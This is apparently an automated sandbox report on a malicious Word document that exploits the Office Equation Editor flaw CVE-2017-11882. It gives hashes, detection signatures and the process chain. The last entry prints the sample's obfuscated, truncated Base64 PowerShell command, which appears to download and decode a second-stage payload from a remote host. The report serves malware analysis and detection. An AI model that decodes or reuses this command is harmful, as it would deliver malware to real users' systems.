Edit tour
Windows
Analysis Report
ConfirmaciXnXdeXfacturaXPedidoXadicional.doc
Overview
General Information
| Sample name: | ConfirmaciXnXdeXfacturaXPedidoXadicional.doc |
| Analysis ID: | 1551308 |
| MD5: | 3585873ff559b339ce1ed181cf2c26c0 |
| SHA1: | 1189fc8c7e1fc8db4d89bbea5b72f7464c499119 |
| SHA256: | 072d452d181adbca486c143de3c41500bdccd335ec909af452360babdd040b92 |
| Tags: | CVE-2017-11882docuser-lowmal3 |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Potential malicious VBS script found (has network functionality)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w7x64
WINWORD.EXE (PID: 3520 cmdline: "C:\Progra m Files\Mi crosoft Of fice\Offic e14\WINWOR D.EXE" /Au tomation - Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5) 
EQNEDT32.EXE (PID: 3600 cmdline: "C:\Progra m Files\Co mmon Files \Microsoft Shared\EQ UATION\EQN EDT32.EXE" -Embeddin g MD5: A87236E214F6D42A65F5DEDAC816AEC8) 
wscript.exe (PID: 3764 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\gdfgc vbi.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A) - wscript.exe (PID: 3820 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\gDHxs qtDodRnltJ FOd.js" MD5: 979D74799EA6C8B8167869A68DF5204A) 
powershell.exe (PID: 3916 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LgAgACgAIA AoAFsAUwB0 AHIAaQBuAE cAXQAkAHYA RQBSAEIAbw BTAGUAUABy AGUARgBFAH IAZQBOAGMA ZQApAFsAMQ AsADMAXQAr ACcAeAAnAC 0AagBvAEkA bgAnACcAKQ AoACgAJwBL ADYAcABpAG 0AYQBnAGUA VQByAGwAJw ArACcAIAA9 ACAAcwAnAC sAJwBTAFgA aAB0AHQAcA BzADoALwAn ACsAJwAvAD EAMAAxADcA LgBmAGkAbA BlAG0AYQBp AGwALgBjAG 8AbQAnACsA JwAvAGEAcA BpACcAKwAn AC8AZgBpAG wAZQAvAGcA ZQB0AD8AZg BpAGwAZQBr AGUAeQAnAC sAJwA9ADIA JwArACcAQQ BhACcAKwAn AF8AYgBXAG 8AOQBSAGUA dQA0ADUAdA A3AEIAVQAx AGsAVgBnAH MAZAA5ACcA KwAnAHAAVA A5AHAAJwAr ACcAZwBTAF MAbAB2AFMA dABHAHIAbg BUAEkAJwAr ACcAQwBmAE YAaABtAFQA SwBqACcAKw AnADMATABD ADYAUwBRAH QASQBjAE8A YwBfAFQAMw A1AHcAJgBw AGsAXwB2AG kAZAA9AGYA ZAA0AGYANg AxADQAYgBi ADIAMAA5AG MANgAyAGMA MQA3ADMAMA A5ADQANQAx ADcANgBhAD AAOQAwADQA ZgAgAHMAUw BYADsASwA2 AHAAdwBlAG IAQwBsAGkA ZQBuAHQAIA A9ACAATgBl AHcALQBPAG IAagBlAGMA dAAgAFMAeQ BzAHQAZQBt AC4ATgBlAH QALgBXAGUA YgBDACcAKw AnAGwAaQBl AG4AdAA7AE sANgBwAGkA bQBhAGcAZQ BCAHkAdABl AHMAIAA9AC AASwA2AHAA dwBlACcAKw AnAGIAQwBs AGkAZQBuAH QALgBEAG8A dwBuAGwAbw BhACcAKwAn AGQARABhAH QAYQAoAEsA NgBwAGkAbQ BhAGcAZQBV AHIAbAApAD sASwA2AHAA aQBtAGEAZw BlAFQAZQB4 AHQAIAA9AC AAWwBTAHkA cwB0AGUAbQ AuAFQAZQB4 AHQALgBFAG 4AYwBvAGQA aQBuAGcAXQ A6ADoAVQBU AEYAOAAuAE cAZQB0AFMA dAByAGkAbg BnACgASwA2 AHAAaQBtAG EAZwBlAEIA eQB0AGUAcw ApADsASwA2 AHAAcwB0AG EAcgB0AEYA bABhAGcAIA A9ACAAcwBT AFgAPAA8AE IAQQBTAEUA NgA0AF8AUw BUAEEAUgBU AD4APgBzAF MAWAA7AEsA NgBwAGUAbg BkAEYAbABh AGcAIAA9AC AAcwAnACsA JwBTAFgAPA A8AEIAQQBT AEUANgA0AF 8ARQAnACsA JwBOAEQAPg A+AHMAUwBY ADsASwA2AH AAcwB0AGEA cgAnACsAJw B0AEkAbgBk AGUAeAAgAD 0AIABLADYA cABpAG0AYQ BnAGUAVABl AHgAdAAuAE kAbgBkAGUA eABPAGYAKA BLADYAcABz AHQAYQByAH QARgBsAGEA ZwApADsASw A2AHAAZQBu AGQASQBuAG QAZQB4ACAA PQAgAEsANg BwAGkAbQBh AGcAZQBUAG UAeAB0AC4A SQBuAGQAZQ B4AE8AZgAo AEsANgBwAG UAbgBkAEYA bABhAGcAKQ A7AEsAJwAr ACcANgBwAH MAdABhAHIA dABJAG4AZA BlAHgAIAAt AGcAZQAgAD AAIAAtAGEA bgBkACAASw A2AHAAZQBu AGQASQBuAG QAZQB4ACAA LQBnAHQAJw ArACcAIABL ADYAcABzAH QAYQByAHQA SQBuAGQAZQ B4ADsASwA2 AHAAcwB0AG EAcgB0AEkA bgBkAGUAeA AgACsAPQAg AEsANgBwAH MAdABhAHIA dABGAGwAYQ BnAC4ATABl AG4AZwB0AG gAOwBLADYA cABiAGEAcw BlADYANABM AGUAbgBnAH QAaAAgAD0A IABLADYAcA BlAG4AZABJ AG4AZABlAH gAIAAtACAA SwA2AHAAcw B0AGEAcgB0 AEkAbgBkAG UAeAA7AEsA NgBwAGIAYQ BzAGUANgAn ACsAJwA0AE MAbwBtAG0A YQBuAGQAIA A9ACAASwA2 AHAAaQBtAG EAZwBlACcA KwAnAFQAZQ B4AHQALgBT AHUAYgBzAH QAcgBpAG4A ZwAoAEsANg BwAHMAdABh AHIAdABJAG 4AZABlAHgA LAAgAEsANg BwAGIAYQBz AGUANgA0AE wAZQBuAGcA dABoACkAOw BLADYAcABi AGEAcwBlAD YANABSAGUA dgBlAHIAcw BlAGQAIAA9 ACAALQBqAG 8AaQBuACAA KABLADYAcA BiAGEAcwBl ADYANABDAG